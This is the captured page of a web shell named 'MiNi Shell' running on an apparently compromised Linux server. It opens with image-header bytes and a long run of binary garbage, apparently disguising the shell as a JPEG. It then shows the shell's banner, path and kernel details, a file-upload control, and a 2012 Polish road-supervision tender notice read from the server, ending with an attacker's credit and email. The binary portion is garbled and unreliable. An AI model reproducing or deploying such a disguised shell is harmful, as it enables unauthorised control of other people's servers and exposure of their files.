JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120309/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120309/55339-N-2012.html

<p class="kh_header"><b>Grudziądz: Pełnienie kompleksowego nadzoru inwestorskiego nad zadaniem: Przebudowa 
ul. Paderewskiego na odcinku od przejazdu PKP do granic miasta</b><br>
<b>Numer ogłoszenia: 55339 - 2012; data zamieszczenia: 09.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Miejskich w Grudziądzu , ul. gen. Józefa Hallera 79, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 0-56 45 10 395, faks 0-56 45 10 395.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zdm.grudziadz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie kompleksowego nadzoru inwestorskiego nad zadaniem: Przebudowa 
ul. Paderewskiego na odcinku od przejazdu PKP do granic miasta.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Ogólna charakterystyka przedmiotu zamówienia
1.	Do obowiązków Nadzoru Inwestorskiego - Wykonawcy należy pełen zakres czynności Inspektora Nadzoru wymieniony w art. 25 i 26 Ustawy z dnia 7 lipca 1994r. Prawo Budowlane (Dz. U. z 2010 r. Nr 243 Poz. 1623 z późn. zm.).
2.	Oprócz czynności, o których mowa w ust.1 do obowiązków Wykonawcy należy:
a)	sprawdzenie i rozliczanie kosztorysów powykonawczych,
b)	udział w komisjach technicznych powoływanych przez Zamawiającego do oceny lub      rozstrzygania technicznych spraw budowy w toku jej realizacji,
c)	sprawdzanie dokumentów rozliczeniowych przedłożonych przez Wykonawcę 
i potwierdzanie wykonania robót,
d)	pisemne potwierdzenie na wniosku Wykonawcy zgłoszenia zakończenia robót oraz udział w końcowym odbiorze - w tym sporządzenie protokołu końcowego odbioru robót,
e)	Wykonawca zobowiązany jest (na każde wezwanie Zamawiającego) do uczestniczenia w przeglądach gwarancyjnych w okresie zgłaszania wad (minimum jeden przegląd w ciągu jednego roku kalendarzowego, lecz nie więcej niż cztery). Za uczestniczenie w przeglądach gwarancyjnych, jak wyżej Wykonawcy nie przysługuje dodatkowe wynagrodzenie.

Pełnienie kompleksowego nadzoru inwestorskiego nad zadaniem: Przebudowa            ul. Paderewskiego na odcinku od przejazdu PKP do granic miasta, które dotyczą następujących obiektów budowlanych lub ich części:
Branża drogowa
W ramach przebudowy układu komunikacyjnego poszerzona zostanie istniejąca nawierzchnia o szerokości 7,0m z jednoczesnym dostosowaniem do obciążenia ruchem drogowym, odpowiadających kategorii KR4. Wybudowane zostanie jednostronny chodnik o szerokości 1,5 -2,0 m oraz ciąg pieszo-rowerowy o szerokości 3,0-3,5 m. Droga po przebudowie posiadać będzie przekrój uliczny z obustronnymi krawężnikami. W ramach przebudowy planuje się wykonać zatokę dla pojazdów obsługujących urządzenia służące ochronie środowiska (osadnik/piaskownik, separator) oraz zatokę autobusową o wymiarach. Projektowana ulica będzie posiadać następujące parametry:
-	długość					 ok.  1095 km
-	przekrój poprzeczny			 uliczny
-	szerokość jezdni				 7,0m
-	szerokość chodnika 			 1,5-2,0m
-	szerokość ciągu pieszo-rowerowego	 3,0-3,5m
-	szerokość pasa zieleni			 1,5m-2,5m
-	kategoria ruchu				  KR4
Zaprojektowano niweletę nawierzchni w zbliżeniu do istniejącej, uwzględniając konieczność zbliżenia się do minimalnego spadku 0,3%. Spadki podłużne na odcinku od przejazdu PKP do granic miasta mieszczą się w granicach od 0,3% do 1,3%. 

Branża elektroinstalacyjna
Usunięcie kolizji istniejących sieci elektroenergetycznych NN-0,4kV
Istniejące kable NN-0,4kV w obrębie przebudowanej jezdni zostaną zabezpieczone rurami dwudzielnymi. Rury ochronne zostaną zamontowane na takiej głębokości by górna krawędź rury ochronnej znajdowała się minimum 1m od nawierzchni ulicy.

Przebudowa istniejącego oświetlania ulicznego
Istniejące dwa słupy oświetleniowe w celu zachowania skrajni z projektowanym pasem drogowym zostaną przestawione. Po przestawieniu pomiędzy słupami poprowadzony będzie kabel YAKY 4x35mm2, razem z kablem ułożona zostanie bednarka Fe/Zn 30x4mm. Istniejące, stare odcinki kabla, które prowadziły do słupów zostaną zdemontowane. W przypadku zbliżeń i skrzyżowań projektowane kable układane będą w rurze osłonowej fi 75mm.

Zabezpieczenie urządzeń teletechnicznych 
Urządzenia teletechniczne kolidujące z istniejącą drogą zostaną zabezpieczone przez nałożenie rur ochronnych dwudzielnych. Rury zostaną zabezpieczone przez zamuleniem. Długość projektowanych rur wynosi około 370m.

Branża sanitarna
Projekt zakłada wykonanie kanalizacji deszczowej i przykanalików kanalizacji deszczowej w ciągu projektowanej ulicy Paderewskiego. Zaprojektowano cztery odcinki kolektorów deszczowych fi 300-500 mm odprowadzające wody deszczowe                    z ul. Paderewskiego do istniejących odbiorników, rzeki Osy, kanału Trynka.
Projektowana kanalizacja deszczowa obejmuje:
-	kanalizację deszczową z rur żelbetonowych fi  300 mm, długość ok. 142 m,
-	kanalizację deszczową z rur PCV fi 300 mm, długość ok. 648 m,
-	kanalizację deszczową z rur PCV fi  400 mm, długość   ok. 6 m,
-	kanalizację deszczową z rur PCV fi 500 mm, długość ok. 166 m
-	przykanaliki:
-	z rur PCV-U, SN8, fi 200 mm, długość ok. 178 m,
-	z rur żelbetonowych klasy fi 200 mm, długość ok. 42 m,
-	wpust ściekowy uliczny fi 500mm - 52 szt.
Wyloty kolektorów deszczowych do kanału Trynka projektuje się fi 300 i 400 mm a do rzeki Osa fi 500. Wyloty zostaną zabezpieczone kratami, aby uniemożliwić przedostanie się do kanału dużych elementów. Do oczyszczania ścieków zostaną zastosowane:
-	wylot I - osadnik fi 2,0m (Vu=5m3) i separator lamelowy 10/100 l/s,
-	wylot II - osadnik fi 2,5m (Vu=7,5m3) i separator lamelowy 15/150 l/s,
-	wylot III - osadnik fi 2,0m (Vu=5m3) i separator lamelowy 10/100 l/s.

Dokładne dane dotyczące szczegółów konstrukcyjnych i rozwiązań technicznych zostały zawarte w dokumentacji projektowej. W związku z powyższym, przed złożeniem oferty Zamawiający zaleca zapoznanie się ze wszystkimi dostępnymi materiałami związanymi z tematem zamówienia w szczególności z dokumentacją projektową i specyfikacjami technicznymi.

  Kontrola realizacji kontraktu
Podstawowym zadaniem Nadzoru Inwestorskiego jest kontrola zgodności działań Wykonawcy Robót z wymaganiami określonymi w umowie na roboty budowlane i obowiązujących przepisach prawa. 
Personel Wykonawcy, w granicach przyznanych mu uprawnień, będzie prowadził kontrolę jakości materiałów i robót, postępu prac oraz potwierdzał ilość i wartość wykonanych robót w sposób określony w szczegółowych specyfikacjach technicznych wykonania i odbioru robót.
W ramach przedmiotowego zadania Geodeta Wykonawcy będzie zobowiązany do:
1)	sprawdzenia zgodności rzędnych wysokościowych i punktów sytuacyjnych pomiędzy stanem rzeczywistym w terenie a przyjętym do projektowania (pomiar zerowy),
2)	sprawowania bieżącego nadzoru geodezyjnego nad realizowanymi robotami drogowymi, dokonywania odbiorów geodezyjnych robót zanikających, wykonania pomiarów sprawdzających wykonania koryta oraz warstw konstrukcyjnych, 
3)	wykonania pomiarów sprawdzających kanalizacji deszczowej,
4)	sprawdzenia kompletności dokumentów przygotowanych przez Wykonawcę robót do odbioru ostatecznego w zakresie operatu geodezyjnego. 
Do obowiązków nadzoru wykonywanego przez Technologa laboranta należeć będzie wykonanie kontrolnych badań laboratoryjnych wg następującego zakresu:
1)	stopień zagęszczenia nasypów oraz gruntu rodzimego lub dna koryta,
2)	badania nośności podbudowy,
3)	ekstrakcje mas bitumicznych,
4)	badania wytrzymałości betonów.
Wszystkie badania objęte zamówieniem muszą być wykonane zgodnie ze Specyfikacjami Technicznymi Wykonania i Odbioru Robót Budowlanych, Polskimi Normami, instrukcjami technicznymi, wytycznymi technicznymi dotyczącymi poszczególnych asortymentów robót przy zachowaniu warunków bezpieczeństwa i higieny pracy.
Zakres badań przewidzianych do wykonania przez Nadzór Inwestorski 

1.  Wykonanie nasypów - Badanie wskaźnika zagęszczenia nasypów oraz gruntu rodzimego lub dna koryta - 20 badań,
2. Podbudowa z kruszywa łamanego - Ugięcie sprężyste - 20 badań 
                                                            - Moduł odkształcenia - 10 badań,
3. Podbudowa z betonu asfaltowego - Ekstrakcja mas bitumicznych - 10 badań,
4. Nawierzchnia z BA  warstwa wiążąca - Ekstrakcja mas bitumicznych - 10 badań,
5. Nawierzchnia z SMA - Ekstrakcja mas bitumicznych - 10 badań,
6. Beton - Badania wytrzymałości betonów na ściskanie - 10 próbek.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium o wartości: 1.400,00 PLN (słownie:   tysiąc czterysta złotych 00/100). 
 Wadium może być wniesione w jednej lub kilku następujących formach: 
1)  pieniądzu, 
2)  poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
3)  gwarancjach bankowych, 
4)  gwarancjach ubezpieczeniowych, 
5)   poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 
 Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego: Bank PKO BP SA numer 31 1020 5040 0000 6902 0085 9652. 
  Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego. 
  Wadium wnoszone w formie: poręczenia bankowego, poręczenia spółdzielczej kasy oszczędnościowo - kredytowej, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczenia udzielanego przez podmioty, o których mowa w art. 6b ust.  5  pkt  2  ustawy 
z dnia 9 listopada 2000  o utworzeniu  Polskiej  Agencji Rozwoju  Przedsiębiorczości  tj. 
(Dz. U. z 2007 r., Nr 41,  Poz.  275 z późn.  zm.),  należy  złożyć  w   formie  oryginału 
w Zarządzie Dróg Miejskich w Grudziądzu, ul. Gen. J. Hallera 79 pokój nr 7. Kopię dokumentu należy dołączyć do oferty. 
              Nie należy załączać oryginału dokumentu wadialnego do oferty. 
Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i art. 46 ust. 5 ustawy Prawo zamówień publicznych. 
Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert. Wadium musi być wniesione na cały okres związania ofertą. Wniesienie wadium na czas krótszy niż okres związania ofertą Zamawiający będzie traktował tak, jakby wadium nie zostało wniesione. 
 Zamawiający zatrzymuje wadium wraz  z  odsetkami, jeżeli  Wykonawca  w  odpowiedzi  na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie. 
  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał: min. 1 usługę polegającą na pełnieniu funkcji Nadzoru Inwestorskiego nad inwestycją polegającą na budowie lub przebudowie ulicy klasy min. Z o długości co najmniej 1 km o wartości min. 5 mln złotych brutto</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób o następujących kwalifikacjach zawodowych, wykształceniu i doświadczeniu:
1. Inspektor Robót Drogowych /Inspektor Koordynator - 1 - Wyższe wykształcenie techniczne, uprawnienia budowlane w specjalności drogowej bez ograniczeń, przynależność do Izby Inżynierów Budownictwa - min. 3-letnie doświadczenie zawodowe od uzyskania uprawnień na stanowisku kierowniczym (kierownik budowy lub robót) lub w nadzorze inwestorskim przy robotach budowlanych w zakresie budowy dróg,
2. Inspektor Robót Sanitarnych - 1 - Wykształcenie techniczne, uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej  w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacji bez ograniczeń, przynależność do Izby Inżynierów Budownictwa - min. 1-roczne doświadczenie zawodowe od uzyskania uprawnień na stanowisku kierowniczym (kierownik budowy lub robót) lub w nadzorze inwestorskim przy robotach budowlanych w tej branży,
3. Inspektor Robót Elektrycznych i Elektroenergetycznych - 1 - Wykształcenie techniczne, uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń  elektroenergetycznych bez ograniczeń, przynależność do Izby Inżynierów Budownictwa,
4. Geodeta - 1 - Wymagane uprawnienia: geodezyjne pomiary syt.-wys., realizacyjne i inwentaryzacyjne,  geodezyjna obsługa inwestycji - 3-letnie doświadczenie zawodowe w tej branży, w tym 1-roczne w budownictwie drogowym,
5. Specjalista ds. obmiarów i rozliczeń - 1 - Wykształcenie wyższe techniczne, znajomość kosztorysowania, wykonywania obmiarów, obliczania ilości robót zgodnie z polskimi i europejskimi standardami z wykorzystaniem przedmiarów na prace budowlane,
6. Technolog laborant - 1 - Wykształcenie wyższe techniczne</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo - jeżeli dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie postanowienia zawiera projekt umowy stanowiący załącznik nr 8 do SIWZ.
 Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy.
Zamawiający może odstąpić od umowy w przypadku, jeżeli Gmina-miasto Grudziądz nie uzyska dofinansowania na realizację inwestycji ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Infrastruktura i Środowisko. Z tego tytułu Wykonawca nie będzie kierował do Zamawiającego jakichkolwiek roszczeń finansowych.     
Zamawiający dopuszcza możliwość zmiany postanowień niniejszej umowy w granicach  wyznaczonych przepisami ustawy Pzp (w tym art. 144 ust. 1) wyłącznie za zgodą stron, w formie pisemnej pod rygorem nieważności. Zamawiający przewiduje, iż zmiany będą mogły nastąpić w następujących przypadkach:
a)	zmiana terminu wykonania przedmiotu na wniosek Zamawiającego - możliwość wydłużenia lub skrócenia czasu wykonania usługi stosownie do rzeczywistego czasu wykonania robót budowlanych, nad którymi sprawowany będzie nadzór,
b)	zmiana treści umowy w zakresie umożliwiającym usunięcie rozbieżności lub niejasności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony,
c)	konieczność wprowadzenia wymagań instytucji współfinansujących realizację przedmiotu umowy,
d)	zmiana osób lub podmiotów odpowiedzialnych za realizację zadania ze strony Wykonawcy lub Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zdm.grudziadz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Miejskich w Grudziądzu ul. Gen. Hallera 79 86-300 Grudziądz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2012 godzina 10:00, miejsce: Zarząd Dróg Miejskich w Grudziądzu ul. Gen. Hallera 79 86-300 Grudziądz Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie finansowane z budżetu miasta oraz ze środków Europejskiego Funduszu   Rozwoju  Regionalnego  w  ramach  Programu  Operacyjnego  Infrastruktura 
i Środowisko.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com